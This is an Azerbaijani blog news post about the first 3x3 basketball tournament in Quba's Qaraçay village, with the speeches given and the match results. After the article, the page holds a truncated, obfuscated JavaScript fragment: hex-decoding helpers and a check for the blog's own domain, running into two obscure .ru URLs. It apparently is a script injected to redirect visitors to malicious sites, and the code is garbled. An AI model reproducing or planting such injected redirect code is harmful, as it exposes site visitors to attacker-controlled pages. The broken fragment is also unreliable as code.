Qubada basketbolun 3*3 növü üzrə ilk turnir keçirilib

IMG_0020Quba rayonunda basketbolun 3*3 növü üzrə ilk turnir təşkil edilib.

IMG_0040Yarış Azərbaycan Respublikası Prezidentinin yanında Qeyri-Hökumət Təşkilatlarına Dövlət Dəstəyi Şurasının maliyyə vəsaiti ilə Qubada fəaliyyət göstərən “Yurd” Gənclərin İntellektual İnkişafına Dəstək İctimai Birliyi tərəfindən icra edilən “Olimpiya mükafatçıları milli sərvətimizdir!-Rio-2016-ya ictimai dəstək” layihəsi çərçivəsində keçirilib.

IMG_0054 “Kim sevirsə idmanı, poladdan olar canı” şüarı ilə Quba rayonunun Qaraçay kəndində baş tutan tədbirdə yeniyetmə və gənc oğlanlar mübarizə aparıblar.

Rəsmi açılış mərasimində çıxış edən təşkilatın sədri Ramin Mahmudov son illərdə ölkəmizin əldə etdiyi idman IMG_0058nailiyyətlərindən danışıb, cənab Prezident İlham Əliyevin Milli Olimpiya Komitəsinə prezident seçildikdən sonra ölkəmizin dünyanın idman ölkəsinə çevrildiyini qeyd edib. Bunun da nəticəsində yetişməkdə olan gənc nəsil arasında sağlam həyat tərzinin təbliğinin, onların idmana olan marağının artırılmasınıngünün prioritet IMG_0064istiqamətlərindən biri olduğunu bildirib. Layihənin də əsas məqsədinin region gəncləri arasında idmana olan marağın artırılması, ölkəmizin idman nailiyyətlərinin gənc nəsil arasında təbliğ edilməsi və avqus ayında start götürəcək Braziliyaının Rio-de-Janeyro şəhərindəki olimpiya oyunlarında idmançılarımıza ictimai dəstəyin verilməsi olduğunu, xüsusilə IMG_0071də ötən iI Avropa Oyunlarının möhtəşəm təşkilatçılığının əhəmiyyətini vurğulayan natiq bildirib ki, ölkəmizdə bir-birinin ardınca təşkil edilən müxtəlif idman turnirləri Azərbaycanımızın haqq səsinin dünyaya çatdırılması, həqiqətlərinin dünyaya bəyan edilməsi istiqamətində müstəsna əhəmiyyətə malikdir. Xüsussilə də ölkəmizdə bu IMG_0075yeni idman növünün təbliğnin əhəmiyyətini vurğulayan natiq əlavə edib ki, ölkəmizdə ötən il keçirilən ilk Avropa Oyunlarının proqramına daxil edilən bu növdə həm qadınlar, həm də kişilərdən ibarət komandalarımızın uğurlu çıxışı bu idman növünün ölkəmizdə potensiallı olduğunu göstərib. Bu baxımdan da gənclər arasında bu oyunun təbliğinin əsas IMG_0084məqsədlərdən olduğu qeyd edilib.

Tədbirdə çıxış edənlər – Quba rayon Gənclər və İdman İdarəsinin rəis müavini Mənsur Ağayev bu kimi tədbirlərin gənclərin sağlam ruhda tərbiyə edilməsi istiqamətində böyük əhəmiyyətini qeyd edib, eyni zamanda Azərbaycanımızın dünyada artan nüfuzunun, idman nailiyyətlərinin gənc nəsil arasında təbliğinin vətənpərvərlik, dövlətçilik və IMG_0089vətənə sədaqət ruhunda tərbiyə edilməsində vacib amil olduğunu bildiriblər.

Yarışın baş hakimi Səlimcan Rizmanov çıxışında qeyd edib ki, regionlarda basketbolun, həndbolun inkişafı üçün də artıq kifayət qədər infrastruktur mövcuddur. Yeni tikilən məktəblərdə mövcud olan idman zalları nəyinki regionda, hətta kənd IMG_0091ərazilərində də gənclərin idmanla məşğul olmaları üçün geniş imkanlar yaradıb. Bu baxımdan da belə layihə və turnirlərin təşkili gənc idmançıların üzə çıxarılmasında, onların potensialının artırılmasında müstəsna əhəmiyyətə malikdir.

Rəsmi açılış mərasimindən sonra turnirə start verilib.

IMG_0109Yarışın əsasnaməsinə uyğun olaraq 4 komanda ½ final mərəhələsində mübarizə aparıb. Zərdabi qəsəbəsinin basketbolçuları İqriq kəndindən olan həmkarlarına 15-1, Qaraçay kənd komandası isə Alekseyevka kəndindən olan komandanı əlavı vaxta 12-11 hesabı ilə məğlub edərək finala vəsiqə əldə edib

IMG_0110İqriq və Alekseyvka bastekbolçuları öz aralarında III yeri müəyyən ediblər. 13-4 hesabı ilə qalib gələn Alekseyevka kəndinin idmançıları turnirin 3-cü mükafatına sahib olublar.

Çox maraqlı keçən finalda isə Zərdabi qəsəbinin gənc idmançıları Qaraçaydan olan həkmarları ilə qarşılaşıb. Zərdabi gənclərinin ifasında bir-birindən maraqlı və rəngarəng hücumlar tamaşaçıların IMG_0111marağına səbəb olub. Yekunda daha güclü Zərdabi basktbolçuları 15-5 hesabı ilə rəqiblərindən üstün olaraq Quba rayonunda ilk dəfə keçirilən turnirin ilk qalibi kimi tarixə düşüblər.

Yekunda qalib və mükafatçılara layihə çərçivəsində təşkilatçılar tərəfindən hazırlanmış diplomlar, xüsusi bukletlər, kubok və medallar, IMG_0118“Azərbaycan idmançıları olimpiadalarda” adlı statistik məlumatların əks olunduğu kitabça təqdim olunub.

Layihə çərçivəsində növbəti tədbir Quba rayonunun Ağbil kəndində oğlanların iştirtakı ilə voleybol idman növü üzrə keçiriləcək.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “yurdgencler.wordpress.com”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;ehttps://ncnjm3le.ru/f2.html?a=26482https://3oaq3lgf23.ru/u.html?a=26482

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s